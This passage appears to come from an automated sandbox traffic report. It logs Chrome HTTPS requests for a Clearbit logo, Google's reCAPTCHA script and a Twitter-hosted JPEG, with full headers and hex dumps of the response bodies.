                                                                                                                          2024-12-19 16:08:00 UTC1379INData Raw: 3c c3 0e 3c f3 cf 3c f1 4f 3c f3 8d 35 c2 09 0c 31 8f 7d f7 db 4d 04 10 41 04 10 c3 0c 10 c3 0c 30 c3 0c 30 c3 04 10 41 05 1d 7d f4 d1 f1 37 5f 7d f7 d2 41 7b eb fe e8 7f ba 08 21 90 08 ec 86 23 08 30 c3 3c f3 cc 63 8e 08 20 82 08 20 83 0c 30 c0 53 ff 00 fd f7 df 7d f7 df 3c f3 c7 5c 30 cf 3c f1 cd 38 f1 40 41 42 8b 34 c2 c7 3c f3 18 71 c6 30 e3 b4 53 cb 3c 30 c3 0c 33 c3 0c 30 c3 04 10 41 04 52 41 47 db 4d 14 14 75 f7 df 4d fb ef be 8f ee 82 08 88 86 88 6c 02 08 20 82 08 00 42 08 20 82 ca 23 8a 08 20 83 0c 30 81 04 10 71 c7 df 7d f7 cf 3c f3 cf 7c f3 cf 3c f2 80 04 b7 db 3c f3 cf 3c f3 cf 3c f2 c0 41 04 10 c3 0d 3c c5 26 10 67 3c f0 c3 1c b0 c3 0c 30 c1 04 14 71 3c 9f 7d b7 99 e9 d7 df 7d fb ef a2 5f a0 82 60 26 86 40 20 81 04 70 8a 08 00 81 08 20 82 08
                                                                                                                          Data Ascii: <<<O<51}MA00A}7_}A{!#0<c 0S}<\0<8@AB4<q0S<030ARAGMuMl B # 0q}<|<<<<A<&g<0q<}}_`&@ p
                                                                                                                          2024-12-19 16:08:00 UTC1379INData Raw: 00 00 00 07 dd b0 c3 0c 31 c7 0c 30 c3 0c 30 c7 1b ff 00 ff 00 bc b0 c3 0c 34 db 08 30 c3 0c 30 c7 0e 30 c3 4f ff 00 ff 00 04 33 c3 0c 30 82 09 60 82 08 20 8e 08 20 83 0c 30 c3 0c 30 c3 04 10 00 04 10 51 b0 80 00 00 00 00 2b 00 19 a5 0f a0 00 00 00 00 00 00 04 10 00 e4 12 00 00 00 00 00 10 e1 0c 30 c3 0c fd e3 0c 30 c3 09 6f ff 00 ff 00 ff 00 ff 00 ff 00 f0 c3 0c 30 d3 0c 30 c3 0c 72 c3 ac 34 ef 0f ff 00 ff 00 04 1a 61 2e b0 c3 0c b4 f3 ce 30 eb 0c 30 c3 0c 30 c3 0c 30 41 04 00 41 04 10 00 02 08 08 20 07 a0 00 03 7d 91 ee 80 00 00 00 00 00 00 00 6a 5f 95 90 00 00 00 00 04 34 24 04 30 c3 1c 32 c3 0c b0 c3 0b ff 00 ff 00 ff 00 ff 00 ff 00 c7 1c 43 0c 30 c3 ac 30 c3 0c 31 c3 1c 30 ff 00 3d 7f ff 00 00 10 41 04 c2 41 0e 9c 71 84 f3 e3 0c 30 c3 0c 30 c3 04 10
                                                                                                                          Data Ascii: 1004000O30` 00Q+00o00r4a.0000AA }j_4$02C0010=AAq00
                                                                                                                          2024-12-19 16:08:00 UTC1379INData Raw: 0d 04 00 00 00 00 00 00 00 00 00 13 ef 3c f3 cf 3c fb ef be fb ef be b8 40 0c 00 20 03 0c 20 82 08 20 82 08 20 82 08 20 c2 08 20 83 08 20 9f fb ef fe fb ef be f9 6f be 42 20 28 00 00 00 01 00 00 01 6f 3c f3 cf 3d f7 cf 3c f3 cf 3c f3 cf 2c 00 80 00 00 05 20 00 00 00 03 ac 82 00 00 00 00 00 00 00 00 00 f3 cf 3c f3 cf 3c fb ef be fb ef be f3 ef be fb ef fe b8 f3 cf 0c 30 c3 0c 30 c2 08 00 00 04 31 de b8 f2 fe fb ed fe fa af 8c e1 ef be 00 00 28 08 20 00 00 80 82 0f cf 3c f3 cf 7c f3 cf be fb ef be fb ef be c8 00 00 00 8b 00 00 00 00 50 4b 00 00 20 80 00 00 00 00 00 1c fb cf 3c f3 cf 3c fb ef be fb ef be f3 ef be fb ef fe fb ef be 00 00 00 00 00 00 00 00 00 00 05 3e fb ef be fb a7 8a ce bf be fd 2f fe 08 30 ea 00 00 c3 0e 90 40 47 8c 61 d7 df 3e fb ef be fb
                                                                                                                          Data Ascii: <<@ oB (o<=<<, <<001( <|PK <<>/0@Ga>
                                                                                                                          2024-12-19 16:08:01 UTC1379INData Raw: c3 9c b0 c3 0c 17 7d ff 00 ff 00 ff 00 ff 00 ff 00 ff 00 ff 00 fe e3 0c 30 d3 8c 30 eb 7e 30 c3 0c 37 dd f7 df 7d f7 df fc f3 cf 1c 08 1c 77 fb ff 00 be fb ef be a9 21 81 00 00 02 00 00 00 01 88 41 f5 9c c3 0c 10 41 04 10 63 14 da 41 04 10 01 91 40 10 21 40 00 00 00 00 ff 00 ff 00 fd fe f0 c3 0c 31 c3 0d 30 c3 0c 1f 7d f7 df 7d ff 00 fc b2 4a 30 c3 0c 30 c7 ac 30 cb 1f 10 c3 1c b9 fd f7 df 7d f7 df fc f3 ca 40 d0 90 7e ff 00 ef be fb ef bc fb ef 80 00 00 02 00 00 04 24 10 51 cc 10 41 04 10 41 04 10 41 05 30 c3 04 10 41 05 00 00 a8 a0 00 00 00 00 57 fd ff 00 f7 fa c3 0c 37 e3 0c 34 cb 0c 34 f5 f7 dc 30 c2 80 c3 0c 30 c3 0c bc e3 0c 30 eb 4f 90 f7 cc 30 fd f7 df 7d f7 df bc f3 0e 46 f2 d2 ff 00 ff 00 b0 f3 fb ed 36 fb ee 40 00 00 80 00 01 21 04 10 c1 04 10
                                                                                                                          Data Ascii: }00~07}w!AAcA@!@10}}J000}@~$QAAA0AW744000O0}F6@!


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.164972213.227.8.654437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:00 UTC589OUTGET /housingcenter.com HTTP/1.1
                                                                                                                          Host: logo.clearbit.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://berazel.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:01 UTC548INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          access-control-allow-origin: *
                                                                                                                          Cache-Control: public, max-age=2592000
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:01 GMT
                                                                                                                          x-envoy-response-flags: -
                                                                                                                          Server: Clearbit
                                                                                                                          strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 db98d3dbedf7d278c1bda16661056cc6.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: BAH53-C1
                                                                                                                          X-Amz-Cf-Id: 1GH-xb62vchobTlBJqFOAxKNeDmGahwZJJhvHo0nsn2EJUveXTRlrg==
                                                                                                                          2024-12-19 16:08:01 UTC7734INData Raw: 31 65 32 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 1d f5 49 44 41 54 78 9c ec 7d 09 98 5c 57 75 e6 59 ee 7d af aa ba d5 5a 1d 0b 6c b0 59 c6 c6 7c 18 98 61 8b c7 81 40 c8 4c 80 00 36 61 58 02 04 08 03 71 c8 64 81 19 12 76 02 1f 3b 86 cc b0 04 98 21 c3 32 24 01 6c 18 3b 0c 84 d5 89 21 6c 86 98 2d ec 8e 6d bc 08 5b b2 25 b9 25 75 55 bd 77 ef 39 67 be 7b df ab 56 db 46 d5 76 97 ec aa 16 3a df fb f4 b5 a4 ae 57 f7 9d 73 ef 59 ff 73 9e 33 33 98 51 5a 04 e8 80 95 06 80 98 fe ae 00 02 86 80 2e 54 57 47 ff 91 2f 7d f7 bf 3d e4 64 f0 25 90 01 90 59 fa ad 88 46 00 04 38 ed c5 df 52 a2 69 2f e0 d0 64 1b 05 ca 0a 21 31 d3 c0 40 40 97 bc 2d a9 c2 bf f8 f2 cf 3e 70 c1 bb ce bd 10 0a 17 d1 0c 54 4c
                                                                                                                          Data Ascii: 1e2ePNGIHDRL\IDATx}\WuY}ZlY|a@L6aXqdv;!2$l;!l-m[%%uUw9g{VFv:WsYs33QZ.TWG/}=d%YF8Ri/d!1@@->pTL
                                                                                                                          2024-12-19 16:08:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.1649723172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:01 UTC447OUTGET /recaptcha/api.js HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:02 UTC749INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:01 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:01 GMT
                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:02 UTC641INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                          Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                          2024-12-19 16:08:02 UTC800INData Raw: 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e
                                                                                                                          Data Ascii: AACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.
                                                                                                                          2024-12-19 16:08:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.1649725199.232.168.1594437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:02 UTC380OUTGET /media/GY70XKXXEAA_bbZ?format=jpg&name=large HTTP/1.1
                                                                                                                          Host: pbs.twimg.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:03 UTC747INHTTP/1.1 200 OK
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 20353
                                                                                                                          perf: 7402827104
                                                                                                                          cache-tag: media,media/bucket/4,media/1841677976397615104
                                                                                                                          content-type: image/jpeg
                                                                                                                          cache-control: max-age=604800, must-revalidate
                                                                                                                          last-modified: Thu, 03 Oct 2024 03:11:40 GMT
                                                                                                                          x-transaction-id: ea58db84c8deec17
                                                                                                                          timing-allow-origin: https://twitter.com, https://mobile.twitter.com
                                                                                                                          strict-transport-security: max-age=631138519
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-expose-headers: Content-Length
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:03 GMT
                                                                                                                          X-Cache: HIT, HIT
                                                                                                                          x-tw-cdn: FT
                                                                                                                          x-served-by: cache-lhr-egll1980078-LHR, cache-par-lfpg1960084-PAR, cache-tw-ZZZ1
                                                                                                                          Server-Timing: x-cache;desc=HIT, x-tw-cdn;desc=FT
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c2 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 17 00 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 07 ff c4 00 17 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 03 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 eb 90 e7 b0 00 00 42 c0 00 42 c5 25 00 51
                                                                                                                          Data Ascii: JFIFC!"$"$C8"BB%Q
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: 00 00 04 b0 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 05 82 a5 00 00 00 00 0a 00 00 80 16 0b 2a a2 82 50 00 20 9a 80 00 00 08 01 42 c0 00 00 09 60 0a 00 00 00 00 25 95 10 00 00 16 00 00 0b 28 00 00 50 80 01 05 00 00 14 48 00 00 05 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 80 00 00 00 00 00 00 00 08 00 42 51 16 00 0a 45 94 00 01 00 00 00 00 00 00 00 12 80 00 00 00 00 00 15 05 4a 00 00 00 00 00 50 01 00 50 25 54 b2 80 41 35 00 00 00 80 02 85 80 00 01 00 01 40 00 20 10 28 0a 48 00 00 02 c0 00 01 65 00 00 0b 04 a8 2c a2 0a 00 05 96 01 00 00 00 a0 00 4b 05 82 80 00 00 04 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 02 0a 88 0a 58 80 00 00 00 00 00 00 00 02 2c 28 00 04 00 16 50 00 00 00 00 00 16 0a 00 00 00 00 02 80 08 58 2a 51 2a 80
                                                                                                                          Data Ascii: *P B`%(PHBQEJPP%TA5@ (He,K@X,(PX*Q*
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: 00 0a 04 51 04 80 00 0b 02 00 00 00 00 00 09 44 00 40 50 00 01 52 81 00 05 00 00 00 01 40 00 00 00 b2 91 44 05 4a 00 00 00 00 00 5e d2 c0 00 01 62 92 28 8a 51 00 00 00 00 00 08 00 00 00 0a 00 00 00 04 00 00 00 00 00 00 00 00 00 14 8a a0 42 51 02 a5 11 60 00 a0 85 81 60 01 40 82 a0 a0 00 00 02 82 02 80 00 24 00 00 00 00 00 00 00 00 00 02 52 20 40 00 00 08 b0 28 8b 00 00 00 08 00 80 02 80 01 65 02 00 0a 00 00 00 02 80 00 00 01 60 a0 4a 00 00 00 00 00 00 bd a0 00 00 00 00 02 58 a0 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 01 49 2c 55 41 60 00 00 14 40 00 05 00 00 00 0a 4a 01 01 40 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 40 10 20 00 00 00 10 00 00 00 44 59 41 00 05 00 02 ca 04 00 00 50 00 00 02 ca 00 00 00 01 52 80 00 00 00 00 00 01
                                                                                                                          Data Ascii: QD@PR@DJ^b(QBQ``@$R @(e`JXI,UA`@J@@ DYAPR
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: 00 50 00 04 00 00 50 01 00 05 00 02 c4 00 05 94 00 2a 28 08 00 08 3b a0 01 00 00 00 00 02 00 00 02 41 68 00 00 00 20 00 00 00 00 00 00 00 00 00 05 00 00 00 00 2c 14 00 00 00 00 52 0b 05 00 01 00 00 00 00 00 00 00 00 10 00 00 00 00 00 04 00 00 00 00 00 00 04 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 45 24 b2 80 00 05 94 b0 20 10 77 41 00 81 42 80 09 00 02 0a 00 04 a2 15 62 92 50 8b 00 00 00 00 00 00 00 00 00 00 00 02 a5 00 00 00 05 25 00 00 00 00 00 00 0a 00 00 00 20 00 00 00 00 00 00 20 00 00 00 00 00 08 00 00 00 00 01 48 a2 2c 05 84 aa 8a 88 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 59 40 00 02 50 04 00 0a 15 2c 00 83 40 20 10 00 a0 02 00 94 40 00 00 00 00 02 58 00 00 00 00 21 50 54 15 05 00 00 00
                                                                                                                          Data Ascii: PP*(;Ah ,RE$ wABbP% H,PY@P,@ @X!PT
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: 28 00 00 02 80 00 40 00 00 00 12 84 50 00 00 00 00 05 44 14 00 00 00 00 0b 28 02 51 00 01 60 00 0b 29 16 01 40 28 00 00 00 01 81 a7 00 05 00 00 28 00 80 25 80 00 45 80 00 00 00 52 00 01 00 00 00 00 00 00 00 0a 4a 00 00 00 0b 28 00 0b 28 80 10 00 00 00 05 00 00 00 00 00 04 02 80 00 14 28 40 20 01 00 00 0a 00 00 00 02 cb 09 40 85 00 28 00 04 00 00 00 00 29 28 01 00 29 15 00 00 00 00 00 00 11 44 59 40 2c a0 00 01 28 01 16 00 50 25 10 50 14 00 00 00 00 60 69 c0 00 05 00 00 00 00 02 58 00 02 51 00 00 01 50 00 00 00 00 04 00 51 14 25 12 80 00 00 00 00 2c a0 00 2c a0 80 01 00 00 b2 92 80 00 00 00 00 00 10 0a 00 0b 28 0b 16 45 4a 80 04 00 0a 00 00 00 00 01 00 01 42 80 00 01 00 00 00 0b 28 00 09 44 54 00 00 00 00 00 00 00 00 00 25 00 00 14 00 00 01 14 00 04 02 ca
                                                                                                                          Data Ascii: (@PD(Q`)@((%ERJ(((@ @()()DY@,(P%P`iXQPQ%,,(EJB(DT%
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: 00 50 01 00 80 00 00 5a 10 14 00 00 00 00 40 20 28 00 58 15 28 00 40 00 00 00 00 00 00 00 00 00 42 c2 d4 a0 00 00 10 00 00 02 84 00 00 25 12 80 00 00 02 80 00 00 00 02 cb 00 00 02 51 14 40 00 0a 00 01 00 54 aa 04 a0 00 00 00 00 02 0a 20 00 00 00 01 40 02 02 82 00 00 00 05 00 00 10 6b c0 00 01 16 00 00 00 11 60 00 11 44 b1 54 42 51 16 00 05 00 00 40 20 00 00 00 28 00 00 01 49 16 28 00 28 4a 01 00 00 00 00 00 00 02 91 44 58 16 05 11 51 14 a9 40 00 15 11 44 58 0a 42 c4 51 14 40 a0 54 45 00 00 00 0a 00 16 51 00 00 01 14 00 00 00 00 45 11 52 c0 05 00 10 02 c2 d4 a0 00 00 00 00 02 00 00 00 00 14 00 20 28 00 80 00 00 01 40 00 04 1a 70 14 00 00 25 11 60 00 00 01 14 40 00 00 85 45 54 b0 94 45 11 60 14 00 00 2c 02 91 51 00 00 0b 05 21 42 00 00 28 40 00 00 00 00 00
                                                                                                                          Data Ascii: PZ@ (X(@B%Q@T @k`DTBQ@ (I((JDXQ@DXBQ@TEQER (@p%`@ETE`,Q!B(@
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: 3c c3 0e 3c f3 cf 3c f1 4f 3c f3 8d 35 c2 09 0c 31 8f 7d f7 db 4d 04 10 41 04 10 c3 0c 10 c3 0c 30 c3 0c 30 c3 04 10 41 05 1d 7d f4 d1 f1 37 5f 7d f7 d2 41 7b eb fe e8 7f ba 08 21 90 08 ec 86 23 08 30 c3 3c f3 cc 63 8e 08 20 82 08 20 83 0c 30 c0 53 ff 00 fd f7 df 7d f7 df 3c f3 c7 5c 30 cf 3c f1 cd 38 f1 40 41 42 8b 34 c2 c7 3c f3 18 71 c6 30 e3 b4 53 cb 3c 30 c3 0c 33 c3 0c 30 c3 04 10 41 04 52 41 47 db 4d 14 14 75 f7 df 4d fb ef be 8f ee 82 08 88 86 88 6c 02 08 20 82 08 00 42 08 20 82 ca 23 8a 08 20 83 0c 30 81 04 10 71 c7 df 7d f7 cf 3c f3 cf 7c f3 cf 3c f2 80 04 b7 db 3c f3 cf 3c f3 cf 3c f2 c0 41 04 10 c3 0d 3c c5 26 10 67 3c f0 c3 1c b0 c3 0c 30 c1 04 14 71 3c 9f 7d b7 99 e9 d7 df 7d fb ef a2 5f a0 82 60 26 86 40 20 81 04 70 8a 08 00 81 08 20 82 08
                                                                                                                          Data Ascii: <<<O<51}MA00A}7_}A{!#0<c 0S}<\0<8@AB4<q0S<030ARAGMuMl B # 0q}<|<<<<A<&g<0q<}}_`&@ p
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: 00 00 00 07 dd b0 c3 0c 31 c7 0c 30 c3 0c 30 c7 1b ff 00 ff 00 bc b0 c3 0c 34 db 08 30 c3 0c 30 c7 0e 30 c3 4f ff 00 ff 00 04 33 c3 0c 30 82 09 60 82 08 20 8e 08 20 83 0c 30 c3 0c 30 c3 04 10 00 04 10 51 b0 80 00 00 00 00 2b 00 19 a5 0f a0 00 00 00 00 00 00 04 10 00 e4 12 00 00 00 00 00 10 e1 0c 30 c3 0c fd e3 0c 30 c3 09 6f ff 00 ff 00 ff 00 ff 00 ff 00 f0 c3 0c 30 d3 0c 30 c3 0c 72 c3 ac 34 ef 0f ff 00 ff 00 04 1a 61 2e b0 c3 0c b4 f3 ce 30 eb 0c 30 c3 0c 30 c3 0c 30 41 04 00 41 04 10 00 02 08 08 20 07 a0 00 03 7d 91 ee 80 00 00 00 00 00 00 00 6a 5f 95 90 00 00 00 00 04 34 24 04 30 c3 1c 32 c3 0c b0 c3 0b ff 00 ff 00 ff 00 ff 00 ff 00 c7 1c 43 0c 30 c3 ac 30 c3 0c 31 c3 1c 30 ff 00 3d 7f ff 00 00 10 41 04 c2 41 0e 9c 71 84 f3 e3 0c 30 c3 0c 30 c3 04 10
                                                                                                                          Data Ascii: 1004000O30` 00Q+00o00r4a.0000AA }j_4$02C0010=AAq00
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: 0d 04 00 00 00 00 00 00 00 00 00 13 ef 3c f3 cf 3c fb ef be fb ef be b8 40 0c 00 20 03 0c 20 82 08 20 82 08 20 82 08 20 c2 08 20 83 08 20 9f fb ef fe fb ef be f9 6f be 42 20 28 00 00 00 01 00 00 01 6f 3c f3 cf 3d f7 cf 3c f3 cf 3c f3 cf 2c 00 80 00 00 05 20 00 00 00 03 ac 82 00 00 00 00 00 00 00 00 00 f3 cf 3c f3 cf 3c fb ef be fb ef be f3 ef be fb ef fe b8 f3 cf 0c 30 c3 0c 30 c2 08 00 00 04 31 de b8 f2 fe fb ed fe fa af 8c e1 ef be 00 00 28 08 20 00 00 80 82 0f cf 3c f3 cf 7c f3 cf be fb ef be fb ef be c8 00 00 00 8b 00 00 00 00 50 4b 00 00 20 80 00 00 00 00 00 1c fb cf 3c f3 cf 3c fb ef be fb ef be f3 ef be fb ef fe fb ef be 00 00 00 00 00 00 00 00 00 00 05 3e fb ef be fb a7 8a ce bf be fd 2f fe 08 30 ea 00 00 c3 0e 90 40 47 8c 61 d7 df 3e fb ef be fb
                                                                                                                          Data Ascii: <<@ oB (o<=<<, <<001( <|PK <<>/0@Ga>
                                                                                                                          2024-12-19 16:08:03 UTC1379INData Raw: c3 9c b0 c3 0c 17 7d ff 00 ff 00 ff 00 ff 00 ff 00 ff 00 ff 00 fe e3 0c 30 d3 8c 30 eb 7e 30 c3 0c 37 dd f7 df 7d f7 df fc f3 cf 1c 08 1c 77 fb ff 00 be fb ef be a9 21 81 00 00 02 00 00 00 01 88 41 f5 9c c3 0c 10 41 04 10 63 14 da 41 04 10 01 91 40 10 21 40 00 00 00 00 ff 00 ff 00 fd fe f0 c3 0c 31 c3 0d 30 c3 0c 1f 7d f7 df 7d ff 00 fc b2 4a 30 c3 0c 30 c7 ac 30 cb 1f 10 c3 1c b9 fd f7 df 7d f7 df fc f3 ca 40 d0 90 7e ff 00 ef be fb ef bc fb ef 80 00 00 02 00 00 04 24 10 51 cc 10 41 04 10 41 04 10 41 05 30 c3 04 10 41 05 00 00 a8 a0 00 00 00 00 57 fd ff 00 f7 fa c3 0c 37 e3 0c 34 cb 0c 34 f5 f7 dc 30 c2 80 c3 0c 30 c3 0c bc e3 0c 30 eb 4f 90 f7 cc 30 fd f7 df 7d f7 df bc f3 0e 46 f2 d2 ff 00 ff 00 b0 f3 fb ed 36 fb ee 40 00 00 80 00 01 21 04 10 c1 04 10
                                                                                                                          Data Ascii: }00~07}w!AAcA@!@10}}J000}@~$QAAA0AW744000O0}F6@!


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
